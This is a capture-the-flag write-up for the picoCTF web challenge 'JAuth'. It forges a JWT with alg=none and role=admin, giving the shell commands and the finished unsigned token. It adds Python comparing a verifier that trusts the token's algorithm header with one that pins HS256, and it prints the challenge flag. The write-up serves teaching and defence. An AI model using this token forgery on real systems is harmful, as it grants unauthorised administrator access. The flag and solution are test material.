# [Web] JAuth (300 pts)

## Question

Most web application developers use third-party components without testing their security. Some of the past affected companies are:

* Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
* Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
* VerticalScope (internet media company) - outdated version of vBulletin forum software used

Can you identify the components and exploit the vulnerable one? The website is running [here](http://saturn.picoctf.net:55823/). Can you become an `admin`?

You can login as `test` with the password `Test123!` to get started.

## Hint

Use the web browser tools to check out the JWT cookie.

The JWT should always have two (2) `.` separators.

## Solution

The challenge gave us a login page. After logging in, there was nothing interesting on the page, so I checked the login request to see what was going on. After login, I got a user token; let's go to [jwt.io](https://jwt.io/) and decode it. The notable field here is `role`: I got the role `user`, so what if we change it to `admin`?

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FVnU31bRkxS76M4furbsK%2FUntitled.png?alt=media&#x26;token=5055d191-6255-4e38-a41b-8cf2e9c6996e" alt=""><figcaption><p>Token</p></figcaption></figure>

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2F6W7m7Wq3yPcu5xHhdzPi%2FUntitled%20(1).png?alt=media&#x26;token=3a5049b7-74f5-4cf0-9745-cd92cc8fa0f7" alt=""><figcaption><p>Decoded Token</p></figcaption></figure>

I tried changing the role to `admin` and sending the request again with the edited token, but it failed: the payload no longer matched the HS256 signature the server checks.

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FPqXepjN2pJ6rcaGxHin0%2FUntitled%20(2).png?alt=media&#x26;token=9837f55a-7fba-4066-9b2d-811b2c6fa3c5" alt=""><figcaption><p>Login using token with modified role</p></figcaption></figure>

Hmm, wait: I could see that the token uses the HS256 algorithm, and maybe that could lead to the [JWT none algorithm vulnerability](https://portswigger.net/kb/issues/00200901_jwt-none-algorithm-supported). I generated my own new token, changing two values: `alg=none` and `role=admin`.

```bash
# Generate new header. JWT segments are base64url with no padding,
# so strip the '=' padding and newlines and map '+/' to '-_'.
echo -n '{"typ":"JWT","alg":"none"}' | base64 | tr -d '=\n' | tr '+/' '-_'
=> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

# Generate new payload the same way
echo -n '{"auth":1674810645022,"agent":"test123","role":"admin","iat":1573358396}' | base64 | tr -d '=\n' | tr '+/' '-_'
=> eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9

# Merged JWT: header.payload. with an empty signature (the trailing '.' keeps the two separators)
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9.
```

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FOS7h5BV6XPtmq5R129fh%2FUntitled%20(3).png?alt=media&#x26;token=78c86bc7-b43f-4f19-a62c-88fbcc3cf08c" alt=""><figcaption><p>New custom token</p></figcaption></figure>

After getting the new token, I sent the request with it. Luckily, this time I was right, and I got the flag.

<figure><img src="https://2930324358-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MCVzu45Bb9LVrMqjdY6%2Fuploads%2FEjaCf9Nnj6MNtNtKeg9M%2FUntitled%20(4).png?alt=media&#x26;token=98bb37a8-78ec-4cd2-b827-9828df720c45" alt=""><figcaption><p>Flag</p></figcaption></figure>
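To see why the edited token was rejected but the unsigned one was accepted, here is an added Python example (not part of this write-up and not the challenge's own code). It puts a verifier that lets the token's `alg` header pick the algorithm, which is the bug the challenge relies on, beside a verifier that pins HS256 and always checks the signature. `SERVER_KEY` is a constructed placeholder secret, not the challenge's key; the `alg=none` payload is the one from the write-up.

```python
import base64
import hashlib
import hmac
import json

# Constructed placeholder: stands in for whatever HMAC secret the server holds.
SERVER_KEY = b"example-secret-not-the-real-one"


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWT segments require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode: restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _compact(obj: dict) -> bytes:
    # jwt.io-style compact JSON: no spaces, insertion order preserved
    return json.dumps(obj, separators=(",", ":")).encode()


def make_hs256_token(payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token, as the server does at login."""
    signing_input = b64url_encode(_compact({"typ": "JWT", "alg": "HS256"})) + "." + b64url_encode(_compact(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def make_unsigned_token(payload: dict) -> str:
    """Build the alg=none token from the write-up: header, payload, empty signature."""
    return b64url_encode(_compact({"typ": "JWT", "alg": "none"})) + "." + b64url_encode(_compact(payload)) + "."


def verify_trusting_header(token: str, key: bytes):
    """VULNERABLE: the token's own header decides how it is verified.

    A header saying "none" skips the signature check entirely, so anyone can
    mint a role=admin token. Returns the payload dict, or None on rejection.
    """
    try:
        h, p, s = token.split(".")
        alg = json.loads(b64url_decode(h)).get("alg")
        if alg == "none":
            return json.loads(b64url_decode(p))
        if alg == "HS256":
            expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
            if hmac.compare_digest(expected, b64url_decode(s)):
                return json.loads(b64url_decode(p))
        return None
    except ValueError:  # bad segment count, bad base64, bad JSON
        return None


def verify_pinned_hs256(token: str, key: bytes):
    """HARDENED: the server, not the token, decides the algorithm.

    Only HS256 is accepted, an empty signature is rejected outright, and the
    MAC is compared in constant time. Returns the payload dict, or None.
    """
    try:
        h, p, s = token.split(".")
        if json.loads(b64url_decode(h)).get("alg") != "HS256" or not s:
            return None
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        return json.loads(b64url_decode(p))
    except ValueError:
        return None


if __name__ == "__main__":
    forged = make_unsigned_token({"auth": 1674810645022, "agent": "test123", "role": "admin", "iat": 1573358396})
    print("forged token:", forged)
    print("trusting verifier:", verify_trusting_header(forged, SERVER_KEY))
    print("pinned verifier:  ", verify_pinned_hs256(forged, SERVER_KEY))
```

The fix on the server side is the one `verify_pinned_hs256` shows: decide the accepted algorithm (and the key) in code, never from the incoming token, and treat a missing or empty signature as a rejection rather than as "nothing to check".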

## Flag

```
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}
```
